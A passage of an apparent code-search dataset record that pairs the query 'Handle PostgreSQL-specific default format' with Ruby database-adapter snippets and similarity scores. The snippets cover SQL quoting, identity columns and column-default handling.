#spaces. Also per\n # scope parsing rules, its not always made a separate token.\n @term_rejects = /:/.freeze\n end",
"def quoteoptions()\n fail \"Not yet implemented\"\n end",
"def sql_literal(value)\n Arel::Nodes::SqlLiteral.new(value)\n end",
"def type_literal_specific(column)\n type = column[:type]\n type = \"double precision\" if type.to_s == 'double'\n column[:size] ||= default_string_column_size if type.to_s == 'varchar'\n elements = column[:size] || column[:elements]\n \"#{type}#{literal(Array(elements)) if elements}#{' UNSIGNED' if column[:unsigned]}\"\n end",
"def quote(value, column = nil)\n case value\n when String, ActiveSupport::Multibyte::Chars\n value_S = value.to_s\n if column && column.type == :binary && column.class.respond_to?(:string_to_binary)\n \"'#{column.class.string_to_binary(value_S)}'\"\n else\n super(value, column)\n end\n else\n super(value, column)\n end\n end",
"def get_combobox_options(params)\n column_name = params[:column]\n CONDITIONS.each { |c| column_name.sub!(/_#{c}$/, \"\") }\n super(:column => column_name)\n end",
"def to_cql_literal(value)\n return 'NULL' if value.nil?\n return \"'#{escape_special_chars(value)}'\" if value.is_a?(String)\n return \"'#{value}'\" if value.is_a?(Symbol)\n return \"#{value}\" if value.is_a?(Numeric)\n return \"'#{value.strftime(CQL_TIMESTAMP_FORMAT)}'\" if value.is_a?(Time) || value.is_a?(DateTime)\n #return \"#{value.to_i * 1000}\" if value.is_a?(Time) || value.is_a?(DateTime)\n\n # Set\n if value.is_a?(Set)\n return \"{#{value.map {|v| to_cql_literal(v)}.join(',')}}\"\n end\n\n # Map\n if value.is_a?(Hash)\n keys = value.keys\n return \"{#{keys.map {|k| \"#{to_cql_literal(k)} : #{to_cql_literal(value[k])}\" }.join(',')} }\"\n end\n\n # List\n return \"[#{value.map {|v| to_cql_literal(v)}.join(',')}]\" if value.is_a?(Array)\n\n return nil\n end",
"def same_case( str , options = Hash.new )\n return str.upcase if options[:upcase] || options[:downcase] == false\n str.downcase\nend",
"def normalize_options(options)\n options = options.dup\n OPTION_ALIASES.each do |canonical_name, aliases|\n alias_key = aliases.detect { |key| options.key?(key) }\n options[canonical_name] ||= options[alias_key] if alias_key\n options.except!(*aliases)\n end\n\n options\n end",
"def update_sql(values=OPTS)\n case values\n when LiteralString\n super\n when String\n super(LiteralString.new(values))\n else\n super\n end\n end",
"def literal_string_append(sql, s)\n sql << \"'\" << db.synchronize(@opts[:server]){|c| c.escape(s)} << \"'\"\n end",
"def double_quote(value)\n return if value.nil?\n\n case value.to_s\n # Ignore keys that contain double quotes or a Arel.star (*)[all columns]\n # or if a table has already been explicitly declared (ex: users.id)\n when \"*\", /((^\".+\"$)|(^[[:alpha:]]+\\.[[:alnum:]]+)|\\(.+\\))/\n value\n else\n PG::Connection.quote_ident(value.to_s)\n end\n end",
"def supports_standard_conforming_strings?\n # Temporarily set the client message level above error to prevent unintentional\n # error messages in the logs when working on a PostgreSQL database server that\n # does not support standard conforming strings.\n client_min_messages_old = client_min_messages\n self.client_min_messages = 'panic'\n\n # postgres-pr does not raise an exception when client_min_messages is set higher\n # than error and \"SHOW standard_conforming_strings\" fails, but returns an empty\n # PGresult instead.\n has_support = select('SHOW standard_conforming_strings').to_a[0][0] rescue false\n self.client_min_messages = client_min_messages_old\n has_support\n end"
] |
[
"0.61051226",
"0.5877964",
"0.584784",
"0.5752945",
"0.5641679",
"0.55594814",
"0.553016",
"0.5495804",
"0.5466278",
"0.5410757",
"0.5399953",
"0.538035",
"0.5236631",
"0.51445156",
"0.5142646",
"0.5113955",
"0.51080203",
"0.51070803",
"0.5061387",
"0.50466436",
"0.50328183",
"0.501064",
"0.5007003",
"0.5005226",
"0.50003445",
"0.49407494",
"0.4915936",
"0.49046806",
"0.48757836",
"0.4868759",
"0.4815229",
"0.4815229",
"0.4812917",
"0.48096463",
"0.48093",
"0.4805711",
"0.4783438",
"0.47740808",
"0.47709802",
"0.4753479",
"0.47522488",
"0.4749778",
"0.4717439",
"0.47010738",
"0.46986222",
"0.469134",
"0.4675401",
"0.46591666",
"0.46547684",
"0.46512756",
"0.4650516",
"0.4648173",
"0.4642451",
"0.46401832",
"0.46381888",
"0.463243",
"0.4622268",
"0.4617038",
"0.4615182",
"0.46021062",
"0.45990825",
"0.458955",
"0.45828426",
"0.4570885",
"0.45582145",
"0.45568848",
"0.45497474",
"0.45393288",
"0.4538624",
"0.4538592",
"0.45265034",
"0.45255345",
"0.45188445",
"0.45158985",
"0.4505682",
"0.4505052",
"0.45046413",
"0.45000204",
"0.44944033",
"0.448572",
"0.44808632",
"0.44782475",
"0.44677007",
"0.4467088",
"0.4456633",
"0.44547528",
"0.4447208",
"0.44464573",
"0.4443555",
"0.44427893",
"0.44379783",
"0.44321564",
"0.44229808",
"0.44171798",
"0.44164494",
"0.44097587",
"0.44069904",
"0.43943596",
"0.4391059",
"0.43910164"
] |
0.5957464
|
1
|
Support identity columns, but only use the identity SQL syntax if no default value is given.
|
def column_definition_default_sql(sql, column)
super
if !column[:serial] && !['smallserial', 'serial', 'bigserial'].include?(column[:type].to_s) && !column[:default]
if (identity = column[:identity])
sql << " GENERATED "
sql << (identity == :always ? "ALWAYS" : "BY DEFAULT")
sql << " AS IDENTITY"
elsif (generated = column[:generated_always_as])
sql << " GENERATED ALWAYS AS (#{literal(generated)}) STORED"
end
end
end
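A minimal usage sketch, assuming a Sequel::Database handle DB connected to PostgreSQL 10+ (12+ for the generated-column branch); table and column names are illustrative:

DB.create_table(:events) do
  Integer :id, identity: true                        # id integer GENERATED BY DEFAULT AS IDENTITY
  Integer :seq, identity: :always                    # seq integer GENERATED ALWAYS AS IDENTITY
  Integer :n
  Integer :double_n, generated_always_as: Sequel[:n] * 2   # GENERATED ALWAYS AS ((n * 2)) STORED
  Integer :counted, identity: true, default: 0       # :default is set, so the guard above skips the identity clause
end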
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @iiTable = get_table_name(sql)\n @iiCol = get_autounique_column(@iiTable)\n @iiEnabled = false\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n @connection.do(enable_identity_insert(@iiTable, true))\n @iiEnabled = true\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n super\n\n exec_query('SELECT @@IDENTITY AS id')\n end",
"def with_identity_insert_enabled(table_name)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def with_identity_insert_enabled(table_name, &block)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def with_identity_insert_enabled(table_name)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def with_identity_insert_enabled(table_name)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def auto_increment_sql\n AUTO_INCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def column_definition_auto_increment_sql(sql, column)\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def post_insert(sql, name, pk, id_value, sequence_name)\n if @iiEnabled\n begin\n @connection.do(enable_identity_insert(@iiTable, false))\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned off\"\n end\n end\n end",
"def post_insert(sql, name, pk, id_value, sequence_name)\n if @iiEnabled\n begin\n @connection.do(enable_identity_insert(@iiTable, false))\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned off\"\n end\n end\n end",
"def auto_increment_sql\n 'AUTOINCREMENT'\n end",
"def column_definition_default_sql(sql, column)\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n end",
"def property_schema_statement(schema)\n statement = super\n statement << ' AUTO_INCREMENT' if supports_serial? && schema[:serial?]\n statement\n end",
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @logger.unknown(\"ODBCAdapter#pre_insert>\") if @trace\n @logger.unknown(\"args=[#{sql}|#{name}|#{pk}|#{id_value}|#{sequence_name}]\") if @trace\n @iiTable = get_table_name(sql)\n @iiCol = get_autounique_column(@iiTable)\n @logger.unknown(\"@iiCol=#{@iiCol}>\") if @trace\n @iiEnabled = false\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n remove_null_sequence_value_from_sql(sql, @iiCol)\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def default_id=(id)\n if @identity_map.has_key? id\n @default_id = id\n else\n raise TypeError.new(\"Default identity must already exist\")\n end\n end",
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @logger.unknown(\"ODBCAdapter#pre_insert>\") if @trace\n @logger.unknown(\"args=[#{sql}|#{name}|#{pk}|#{id_value}|#{sequence_name}]\") if @trace\n @iiTable = get_table_name(sql)\n @logger.unknown(\"@iiTable=#{@iiTable}\") if @trace\n @iiCol = get_autounique_column(@iiTable)\n @logger.unknown(\"@iiCol=#{@iiCol}\") if @trace\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n remove_null_sequence_value_from_sql(sql, @iiCol)\n# rescue Exception => e\n# raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def identity\n :id\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n table = sql.split(\" \", 4)[2]\n super || last_insert_id(table, sequence_name || default_sequence_name(table, pk))\n end",
"def attributes_protected_by_default\n begin\n default = [primary_key, inheritance_column]\n\n if !primary_key.eql?('id')\n default << 'id'\n end\n rescue ActiveRecord::NoDatabaseError\n default = []\n end\n\n return default\n end",
"def load_identity!\n row_size.times do |r|\n column_size.times do |c|\n self[r, c] = (r == c ? 1 : 0)\n end\n end\n self\n end",
"def id_column\n IdMethods::ID_COLUMN\n end",
"def binds_have_identity_column?(binds)\n binds.any? do |column_value|\n column, value = column_value\n SQLServerColumn === column && column.is_identity?\n end\n end",
"def attributes_protected_by_default\n # default = [ self.class.primary_key, self.class.inheritance_column ]\n # default << 'id' unless self.class.primary_key.eql? 'id'\n # default\n []\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n return super if id_value\n pk = pk_from_insert_sql(sql) unless pk\n select_value(\"#{sql} RETURNING #{quote_column_name(pk)}\")\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n return super if id_value\n pk = pk_from_insert_sql(sql) unless pk\n select_value(\"#{sql} RETURNING #{quote_column_name(pk)}\")\n end",
"def insert_statement(model, properties, serial)\n statement = \"\"\n # Check if there is a serial property being set directly\n require_identity_insert = !properties.empty? && properties.any? { |property| property.serial? }\n set_identity_insert(model, statement, true) if require_identity_insert\n statement << super\n set_identity_insert(model, statement, false) if require_identity_insert\n statement\n end",
"def insert_statement(model, properties, identity_field)\n statement = \"INSERT INTO #{quote_name(model.storage_name(name))} \"\n\n if supports_default_values? && properties.empty?\n statement << 'DEFAULT VALUES'\n else\n statement << <<-SQL.compress_lines\n (#{properties.map { |property| quote_name(property.field) }.join(', ')})\n VALUES\n (#{(['?'] * properties.size).join(', ')})\n SQL\n end\n\n if supports_returning? && identity_field\n statement << \" RETURNING #{quote_name(identity_field.field)}\"\n end\n\n statement\n end",
"def identity(options = {})\n self._identity = options\n end",
"def property_schema_statement(schema)\n statement = super\n\n if schema.has_key?(:sequence_name)\n statement << \" DEFAULT nextval('#{schema[:sequence_name]}') NOT NULL\"\n end\n\n statement\n end",
"def default(id = T.unsafe(nil)); end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def insert_sql(sql, name = nil, pri_key = nil, id_value = nil, sequence_name = nil)\n unless pri_key\n table_ref = extract_table_ref_from_insert_sql(sql)\n pri_key = primary_key(table_ref) if table_ref\n end\n\n if pri_key\n select_value(\"#{sql} RETURNING #{quote_column_name(pri_key)}\")\n else\n super\n end\n end",
"def test_mysql_integer_not_null_defaults\n klass = Class.new(ActiveRecord::Base)\n klass.table_name = 'test_integer_not_null_default_zero'\n klass.connection.create_table klass.table_name do |t|\n t.column :zero, :integer, :null => false, :default => 0\n t.column :omit, :integer, :null => false\n end\n\n assert_equal 0, klass.columns_hash['zero'].default\n assert !klass.columns_hash['zero'].null\n # 0 in MySQL 4, nil in 5.\n assert [0, nil].include?(klass.columns_hash['omit'].default)\n assert !klass.columns_hash['omit'].null\n\n assert_raise(ActiveRecord::StatementInvalid) { klass.create! }\n\n assert_nothing_raised do\n instance = klass.create!(:omit => 1)\n assert_equal 0, instance.zero\n assert_equal 1, instance.omit\n end\n ensure\n klass.connection.drop_table(klass.table_name) rescue nil\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def default_values_clause\n 'VALUES (DEFAULT)'\n end",
"def column_definition_serial(field)\n \"INTEGER PRIMARY KEY AUTOINCREMENT\"\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def default_column?(col)\n if col == \"id\" || col == \"created_at\" || col == \"updated_at\" then\n return true\n end\n false\n end",
"def column_definition_null_sql(sql, column)\n null = column.fetch(:null, column[:allow_null])\n if null.nil? && !can_add_primary_key_constraint_on_nullable_columns? && column[:primary_key]\n null = false\n end\n\n case null\n when false\n sql << ' NOT NULL'\n when true\n sql << ' NULL'\n end\n end",
"def column_default(key)\n self.class.column_default(key)\n end",
"def insert_default_values_sql\n \"INSERT INTO #{source_list(@opts[:from])} DEFAULT VALUES\"\n end",
"def can_add_primary_key_constraint_on_nullable_columns?\n true\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n execute(sql, name)\n id_value\n end",
"def identity=(value)\n @identity = value\n end",
"def force_primary_key(klass)\n # Automatically add an :oid serializable field if none is\n # defined and no other primary key is defined.\n if klass.primary_key == :oid and !klass.instance_attributes.include?(:oid)\n klass.attr_accessor :oid, Fixnum, :sql => primary_key_type\n end\n end",
"def execute_insert(sql, opts=OPTS)\n execute(sql, opts.merge(:meth=>:autoid))\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n # Extract the table from the insert sql. Yuck.\n table = sql.split(\" \", 4)[2].gsub('\"', '')\n\n # Otherwise, insert then grab last_insert_id.\n if insert_id = super\n insert_id\n else\n # If neither pk nor sequence name is given, look them up.\n unless pk || sequence_name\n pk, sequence_name = *pk_and_sequence_for(table)\n end\n\n # If a pk is given, fallback to default sequence name.\n # Don't fetch last insert id for a table without a pk.\n if pk && sequence_name ||= default_sequence_name(table, pk)\n last_insert_id(table, sequence_name)\n end\n end\n end",
"def default\n by_id(default_id)\n end",
"def sql_for_insert(sql, pk, id_value, sequence_name, binds)\n unless pk\n table_ref = extract_table_ref_from_insert_sql(sql)\n pk = primary_key(table_ref) if table_ref\n end\n\n sql = \"#{sql} RETURNING #{quote_column_name(pk)}\" if pk\n\n [sql, binds]\n end",
"def col_names_for_insert\r\n self.class.column_names.delete_if {|col| col == \"id\"}.join(\", \")\r\nend",
"def identity=(v)\n @identity = v\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil) end",
"def identity?\n options[:identity]\n end",
"def default_when_null(sql, default)\n \"COALESCE (#{sql}, #{dispatch(default)})\"\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def attributes_protected_by_default\n ['id']\n end",
"def supports_primary_key?\n true\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super\n end",
"def serial_primary_key_options\n # :nocov:\n auto_increment_key = server_version >= 100002 ? :identity : :serial\n # :nocov:\n {:primary_key => true, auto_increment_key => true, :type=>Integer}\n end",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def belongs_to_identity(assoc, options={})\r\n other_model = assoc.to_s.camelize.constantize\r\n fk = :\"#{other_model.model_name.to_s.underscore}_identity\"\r\n if defined?(@slowly_changing_columns)\r\n @slowly_changing_columns << [fk, other_model.identity_column_definition.last]\r\n @slowly_changing_indices << fk\r\n end\r\n if ActiveRecord::VERSION::MAJOR > 3\r\n belongs_to assoc, ->{ where \"#{other_model.effective_to_column_sql()}=#{END_OF_TIME}\" },\r\n options.reverse_merge(foreign_key: fk, primary_key: IDENTITY_COLUMN)\r\n else\r\n belongs_to assoc, options.reverse_merge(\r\n foreign_key: fk, primary_key: IDENTITY_COLUMN,\r\n conditions: \"#{other_model.effective_to_column_sql()}=#{END_OF_TIME}\"\r\n )\r\n end\r\n define_method :\"#{assoc}_at\" do |date=nil|\r\n other_model.at_date(date).where(IDENTITY_COLUMN=>send(fk)).first\r\n end\r\n end",
"def manually_autoincrement_id\n # no idea why this is necessary\n # ActiveRecord::StatementInvalid: PGError: ERROR: null value in column \"ID\" violates not-null constraint\n self.ID = Presto::Post.recent.first.ID.to_i + 1\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def default_columns\n#\t\t%w( id case_icf_master_id mother_icf_master_id icf_master_id \n\t\t%w( id case_icf_master_id mother_icf_master_id icf_master_id \n\t\t\tsubject_type vital_status sex dob \n\t\t\tfirst_name last_name)\n\tend",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(*insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def identity(input, name: nil)\n _op(:identity, input, nil, name: name)\n end",
"def identifier\n id || name || default_identifier\n end",
"def add_no_pk(options={})\n column_names = options.keys\n values = options.values\n\n individual_values = []\n\n values.each do |value|\n if value.is_a?(String)\n individual_values << \"'#{value}'\"\n else\n individual_values << value\n end\n end\n\n column_names_for_sql = column_names.join(\", \")\n individual_values_for_sql = individual_values.join(\", \")\n\n CONNECTION.execute(\"INSERT INTO #{get_table_name} (#{column_names_for_sql}) VALUES (#{individual_values_for_sql});\")\n\n self.new(options)\n end",
"def generate_identity\n handle_name ||= username if respond_to?(:username)\n handle_name ||= short_name if respond_to?(:short_name)\n handle_name ||= name.parameterize(\"_\").gsub(\"-\",\"_\") if respond_to?(:name)\n\n self.handle = Handle.build_unique(self, handle_name)\n self.handle.identifiable = self\n\n self[identity_field] = handle.name\n instance_variable_set(:\"@#{identity_field}\", handle.name)\n end",
"def last_insert_id(conn, opts={})\n nil\n end",
"def last_insert_id(conn, opts={})\n nil\n end",
"def supports_primary_key?\n true\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil, binds = [])\n # Extract the table from the insert sql. Yuck.\n table = sql.split(\" \", 4)[2].gsub('\"', '')\n\n # Try an insert with 'returning id' if available (PG >= 8.2)\n if supports_insert_with_returning? && id_value.nil?\n pk, sequence_name = *pk_and_sequence_for(table) unless pk\n if pk\n sql = substitute_binds(sql, binds)\n id_value = select_value(\"#{sql} RETURNING #{quote_column_name(pk)}\")\n clear_query_cache #FIXME: Why now?\n return id_value\n end\n end\n\n # Otherwise, plain insert\n execute(sql, name, binds)\n\n # Don't need to look up id_value if we already have it.\n # (and can't in case of non-sequence PK)\n unless id_value\n # If neither pk nor sequence name is given, look them up.\n unless pk || sequence_name\n pk, sequence_name = *pk_and_sequence_for(table)\n end\n\n # If a pk is given, fallback to default sequence name.\n # Don't fetch last insert id for a table without a pk.\n if pk && sequence_name ||= default_sequence_name(table, pk)\n id_value = last_insert_id(table, sequence_name)\n end\n end\n id_value\n end",
"def last_insert_id(conn, opts={})\n stmt = conn.createStatement\n begin\n sql = opts[:prepared] ? 'SELECT @@IDENTITY' : 'SELECT SCOPE_IDENTITY()'\n rs = log_yield(sql){stmt.executeQuery(sql)}\n rs.next\n rs.getInt(1)\n ensure\n stmt.close\n end\n end",
"def default?\n @id == :default\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n identity = select_value(\"SELECT scope_identity()\")\n if identity.class == System::DBNull\n nil\n else\n System::Convert.to_int32(identity)\n end\n end",
"def auto_generate_id\n false\n end",
"def quote_identifiers_default\n true\n end",
"def primary_key\n 'id'\n end",
"def minimum_id(...)\n end",
"def key(*fields)\n self.primary_key = fields\n identity(:type => String)\n set_callback :save, :before, :identify\n end",
"def identity(input, name: nil)\n _op(:identity, input, name: name)\n end",
"def col_names_for_insert\n self.class.column_names.delete_if do |col|\n col == \"id\"\n end.join(\", \")\n end",
"def insert\n col_names = self.class.columns.join(\", \")\n question_marks = ([\"?\"] * self.class.columns.length).join(\", \")\n DBConnection.execute(<<-SQL, *attribute_values)\n INSERT INTO\n #{self.class.table_name} (#{col_names})\n VALUES\n (#{question_marks})\n SQL\n\n self.id = DBConnection.last_insert_row_id\n end",
"def primary_key\n fail NotImplementedError\n end",
"def standard_columns\n pset = %w[id created_at updated_at contactid user_id\n extra_log_type admin_id]\n\n # Only add in the master_id if the master is a foreign key, not a standard integer field\n # so that we treat the field correctly in comparisons of new - old\n pset << 'master_id' if master_fk?\n\n pset += [\"#{table_name.singularize}_table_id\", \"#{table_name.singularize}_id\"]\n pset\n end"
] |
[
"0.6527207",
"0.6237912",
"0.62254494",
"0.619042",
"0.61669624",
"0.61669624",
"0.6040682",
"0.6005519",
"0.6005519",
"0.59868515",
"0.5979152",
"0.59677976",
"0.59677976",
"0.59347665",
"0.58789515",
"0.5854652",
"0.5758402",
"0.57253426",
"0.57253426",
"0.5648476",
"0.5648476",
"0.5626624",
"0.5607997",
"0.5580494",
"0.5569909",
"0.5558238",
"0.549398",
"0.54835343",
"0.5480638",
"0.5467122",
"0.5452428",
"0.5452428",
"0.5365619",
"0.536536",
"0.535894",
"0.53374386",
"0.52618295",
"0.52354085",
"0.5227512",
"0.52235055",
"0.52095294",
"0.51966923",
"0.5180208",
"0.51755196",
"0.5174454",
"0.51414",
"0.5135195",
"0.5127471",
"0.51264447",
"0.5106506",
"0.5102621",
"0.5085302",
"0.50689083",
"0.5057943",
"0.50283444",
"0.50086445",
"0.50086445",
"0.5008336",
"0.50072026",
"0.5003555",
"0.49743232",
"0.4974292",
"0.49719527",
"0.49707398",
"0.4964244",
"0.49323323",
"0.493047",
"0.4909101",
"0.48918772",
"0.48914608",
"0.48891214",
"0.48879498",
"0.48868757",
"0.48832756",
"0.48770767",
"0.4875006",
"0.486934",
"0.48653212",
"0.4857309",
"0.48567265",
"0.48561412",
"0.48508328",
"0.48494753",
"0.48437363",
"0.48437363",
"0.48368785",
"0.4833405",
"0.48304722",
"0.48259306",
"0.48247388",
"0.48246527",
"0.4824445",
"0.48229176",
"0.48194855",
"0.4818885",
"0.4817425",
"0.4815043",
"0.48142847",
"0.48056895",
"0.4803939"
] |
0.6951704
|
0
|
Handle PostgreSQL-specific default format.
|
def column_schema_normalize_default(default, type)
if m = /\A(?:B?('.*')::[^']+|\((-?\d+(?:\.\d+)?)\))\z/.match(default)
default = m[1] || m[2]
end
super(default, type)
end
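An illustrative check of the regex against typical PostgreSQL default expressions (a standalone sketch; the inputs are assumed examples of what the server reports for column defaults):

RE = /\A(?:B?('.*')::[^']+|\((-?\d+(?:\.\d+)?)\))\z/

["'hello'::character varying",   # cast-wrapped string literal  => "'hello'"
 "B'101'::\"bit\"",              # bit-string literal           => "'101'"
 "(-42)",                        # parenthesized number         => "-42"
 "nextval('t_id_seq')"           # no match: left for super to normalize
].each do |default|
  m = RE.match(default)
  puts "#{default.inspect} => #{(m ? (m[1] || m[2]) : default).inspect}"
end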
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def default_format=(format)\n @default_format = format\n end",
"def default_format\n @default_format ||= :html\n end",
"def set_default_format\n @default_format=\"pdf\"\n end",
"def set_date_format(format) \n unless format.nil?\n return format\n else\n return @@db_format\n end\n end",
"def formats; end",
"def formats; end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.to_s\n def default.inspect\n \"#{super}.lit\"\n end\n default\n end\n end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.dup\n def default.inspect\n \"Sequel::LiteralString.new(#{super})\"\n end\n default\n end\n end",
"def parse_postgresql_overrides\n Gitlab['patroni']['postgresql'] ||= {}\n POSTGRESQL_DCS_PARAMETERS.each do |key|\n Gitlab['patroni']['postgresql'][key] ||= postgresql_setting(key)\n end\n end",
"def _process_format(format); end",
"def _process_format(format); end",
"def revert_postgres_type( type )\n case type\n when /\\Acharacter varying/\n return :String, :default_size => 255\n when /\\Acharacter/\n return :String, :fixed => true, :default_size => 255\n when /\\Atext\\z/\n return :String, :text => true\n when /\\Abytea\\z/\n return :blob\n when /\\Atimestamp/\n return :timestamp\n end\n end",
"def default\n if @default\n sql = \"SELECT CAST(#{@default} AS #{column_def}) FROM RDB$DATABASE\"\n connection = ActiveRecord::Base.connection\n if connection\n value = connection.select_one(sql)['cast']\n if value.acts_like?(:date) or value.acts_like?(:time)\n nil\n else\n type_cast(value)\n end\n else\n raise ConnectionNotEstablished, \"No Firebird connections established.\"\n end\n end\n end",
"def default_format= format\n @worksheet.add_format format if @worksheet\n @default_format = format\n end",
"def default_format(*value)\n set_format(@entry_format_default, *value)\n end",
"def format\n params.fetch(:format, default_format)\n end",
"def format\n @format ||= self._format_default\n end",
"def default_formats\n attr_formats = {}\n columns.each do |column|\n attr_formats[column.name] = case column.type\n when :integer, :float\n {:class => :right, :formatter => :number_with_delimiter}\n when :text, :string\n {}\n when :date, :datetime\n {}\n else\n {}\n end\n end\n attr_formats\n end",
"def default_format\n @default_format || @worksheet.default_format || @workbook.default_format\n end",
"def target_postgresql_version=(_arg0); end",
"def target_postgresql_version; end",
"def typus_date_format(attribute = :default)\n Typus::Configuration.config[name]['fields']['options']['date_formats'][attribute.to_s].to_sym\n rescue\n :db\n end",
"def adapter_initialize\n @use_iso_date_format = typecast_value_boolean(@opts.fetch(:use_iso_date_format, Postgres.instance_variable_get(:@use_iso_date_format))) # , true)) # SEQUEL5\n initialize_postgres_adapter\n add_conversion_proc(17, method(:unescape_bytea)) if USES_PG\n add_conversion_proc(1082, TYPE_TRANSLATOR.method(:date)) if @use_iso_date_format\n self.convert_infinite_timestamps = @opts[:convert_infinite_timestamps]\n end",
"def default_format\n case input_type\n when :bootstrap_date\n I18n.t('date.formats.default')\n when :bootstrap_date_time\n I18n.t('time.formats.default')\n end\n end",
"def default_options_date_format(format)\n format || '%Y-%m-%d - %l:%M:%S%p'\n end",
"def format\n raise NotImplementedError\n end",
"def set_format_for_row(format)\n @sheet.row(@current_row).default_format = format\n end",
"def pg\n uri = URI.parse( hpg_resolve(shift_argument, \"DATABASE_URL\").url )\n config = {\n 'name' => gen_datasource_name(\"PostgreSQL\"),\n 'type' => \"POSTGRESQL\",\n 'config' => {\n 'host' => uri.host,\n 'port' => uri.port || 5432,\n 'database' => uri.path[1..-1],\n 'username' => uri.user,\n 'password' => uri.password,\n 'use_ssl' => true,\n 'validate_ssl_cert' => false\n }\n }\n open_jackdb(config)\n end",
"def process_postgres(target)\n {\n :schema => 'iglu:com.snowplowanalytics.snowplow.storage/postgresql_config/jsonschema/1-0-0',\n :data => {\n :name => target['name'],\n :host => target['host'],\n :database => target['database'],\n :port => target['port'],\n :sslMode => target['ssl_mode'].upcase,\n :schema => target['table'].split('.')[0],\n :username => target['username'],\n :password => target['password'],\n :purpose => 'ENRICHED_EVENTS'\n }\n }\nend",
"def default_timestamp_format\n \"TIMESTAMP '%Y-%m-%d %H:%M:%S%N %z'\".freeze\n end",
"def determine_and_set_format options\n options.format = @template_format = options.format || @template_format\n end",
"def encoding\n select_value(\"SELECT pg_encoding_to_char(encoding) FROM pg_database WHERE datname LIKE '#{current_database}'\", 'SCHEMA')\n end",
